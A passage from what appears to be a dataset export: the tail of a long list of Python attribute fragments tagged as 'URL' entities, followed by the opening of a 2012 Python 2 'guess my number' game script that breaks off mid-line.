'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'missing.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'six.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'missing.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'CONF.im'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'StringIO.St'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'timeutils.is'], ['URL', 'dt1.st'], ['URL', 'dt1.st'], ['URL', 'dt1.st'], ['URL', 'timeutils.is'], ['URL', 'ts.st'], ['URL', 'ts.st'], ['URL', 'timeutils.is'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'detail.xxx'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'images.xxx'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'members.xxx'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'record.ke'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.bo'], ['URL', 'res.bo'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'headers.it'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'hashlib.md'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'hashlib.md'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'headers.ke'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'hashlib.md'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'header.it'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.body.fi'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'header.it'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'base.Is'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'glance.context.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.se'], ['URL', 'images.Im'], ['URL', 'self.FI'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.me'], ['URL', 'self.FI'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.me'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.serializer.me'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.sh'], ['URL', 'self.FI'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'response.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'response.re'], ['URL', 'self.serializer.sh'], ['URL', 'self.FI'], ['URL', 'self.as'], ['URL', 'response.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'self.FI'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.as'], ['URL', 'self.stubs.Se'], ['URL', 'self.serializer.no'], ['URL', 'glance.api.common.im'], ['URL', 'self.serializer.no'], ['URL', 'self.as'], ['URL', 'image.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'self.FI'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.as'], ['URL', 'self.stubs.Se'], ['URL', 'self.serializer.no'], ['URL', 'glance.api.common.im'], ['URL', 'self.serializer.no'], ['URL', 'self.as'], ['URL', 'copy.de'], ['URL', 'glance.api.v1.images.red'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'copy.de'], ['URL', 'glance.api.v1.images.red'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'base.Is'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'base.Is'], ['URL', 'self.ma'], ['URL', 'routes.Ma'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'api.se'], ['URL', 'api.ge'], ['URL', 'models.re'], ['URL', 'self.de'], ['URL', 'models.re'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'image.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st']]" +24,"#!/usr/bin/python +# version 4 +# april 2012 +# this was written by saikia81 and is copyrighted under the GNU general public license 3 +# it was written in notepad++, a program I recommend! +# whitespace ftw! + + +#import random, system and operating system possibilities. +import os, sys +import random, time #time moduele +#pickling for data2file +import cPickle as pickle + + +#introducing the player +def instructions(): + print 'welcome to the guess my number game V4' + print ""I'll think of a number and you have to guess it\n"" + +#making a list of all possible numbers for every dificulty +def list_numbers(): + list_easy = [] + list_medium = [] + list_hard = [] + for n in range(1,101): + list_easy.append(n) + list_medium.append(n) + list_hard.append(n) + for n in range(101,201): + list_medium.append(n) + list_hard.append(n) + for n in range(-201,0): + n += 1 + list_hard.append(n) + return list_easy, list_medium, list_hard + + +#does the player want to change the dificulty +def change_dificulty(dificulty): + if dificulty == None: + dificulty = choose_dificulty() + return dificulty + if raw_input(""do you want to change dificulty? yes/no: "") == 'yes': + dificulty = choose_dificulty() + return dificulty + else: + return dificulty + + +#the dificulty the player wants to choose +def choose_dificulty(): + print '\nwhat 